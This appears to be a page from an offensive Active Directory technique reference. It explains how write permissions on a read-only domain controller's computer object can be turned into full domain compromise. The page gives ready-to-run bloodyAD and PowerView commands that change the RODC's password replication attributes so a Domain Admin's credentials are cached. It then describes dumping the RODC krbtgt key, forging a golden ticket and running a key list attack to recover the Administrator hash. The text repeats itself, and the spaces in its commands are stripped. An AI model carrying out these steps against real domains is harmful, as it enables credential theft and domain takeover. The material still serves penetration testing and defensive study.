With administrative control over the RODC computer object in the Active Directory, there is a path to fully compromise the domain. It is possible to modify the RODC’s msDS-NeverRevealGroup and msDS-RevealOnDemandGroup attributes to allow a Domain Admin to authenticate and dump his credentials via administrative access over the RODC host.
For more granularity, one of these ACEs against the RODC object is initially sufficient, since they will implicitly allow WriteProperty against the msDS-RevealOnDemandGroup and msDS-NeverRevealGroup attributes:
GenericWrite
GenericAll / FullControl
WriteDacl (the attacker can modify the DACL and obtain arbitrary permissions)
Owns (c.f. WriteDacl)
WriteOwner (i.e. the attacker can obtain Owns -> WriteDacl -> other permissions)
WriteProperty against the msDS-RevealOnDemandGroupattribute in conjunction with another primitive to gain privileged access to the host. WriteProperty against the msDS-NeverRevealGroup attribute may be required if it includes the target account.
# Get original msDS-RevealOnDemandGroup values bloodyAD--host"$DC_IP"-d"$DOMAIN"-u"$USER"-p"$PASSWORD"getobject'RODC-server$'--attrmsDS-RevealOnDemandGroupdistinguishedName:CN=RODC,CN=Computers,DC=domain,DC=localmsDS-RevealOnDemandGroup:CN=AllowedRODCPasswordReplicationGroup,CN=Users,DC=domain,DC=local# Add the previous value plus the admin accountbloodyAD--host"$DC_IP"-d"$DOMAIN"-u"$USER"-p"$PASSWORD"setobject'RODC-server$'--attrmsDS-RevealOnDemandGroup-v'CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local'-v'CN=Administrator,CN=Users,DC=domain,DC=local'#If needed, remove the admin from the msDS-NeverRevealGroup attributebloodyAD--host"$DC_IP"-d"$DOMAIN"-u"$USER"-p"$PASSWORD"setobject'RODC-server$'--attrmsDS-NeverRevealGroup
Then, dump the krbtgt_XXXXX key on the RODC server with admin access on the host (this can be done by modifying the managedBy attribute for example), and use it to forge a RODC golden ticket and conduct a key list attack to retrieve the domain Administrator's password hash.
powerview"$DOMAIN"/"$USER":"$PASSWORD"@"RODC_FQDN"#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute#Then, append the Allowed RODC Password Replication Group groupPV>Set-DomainObject-IdentityRODC-server$ -SetmsDS-RevealOnDemandGroup='CN=Administrator,CN=Users,DC=domain,DC=local'PV>Set-DomainObject-IdentityRODC-server$ -AppendmsDS-RevealOnDemandGroup='CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local'#If needed, remove the admin from the msDS-NeverRevealGroup attributePV>Set-DomainObject-IdentityRODC-server$ -ClearmsDS-NeverRevealGroup
From Windows systems, PowerView (PowerShell) can be used for this purpose.
#First, add a domain admin account to the msDS-RevealOnDemandGroup attributeSet-DomainObject-Identity RODC-Server$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local','CN=Administrator,CN=Users,DC=domain,DC=local')}#If needed, remove the admin from the msDS-NeverRevealGroup attributeSet-DomainObject-Identity RODC-Server$ -Clear 'msDS-NeverRevealGroup'
Then, dump the krbtgt_XXXXX key on the RODC server with admin access on the host (this can be done by modifying the managedBy attribute for example), and use it to forge a RODC golden ticket and conduct a key list attack to retrieve the domain Administrator's password hash.
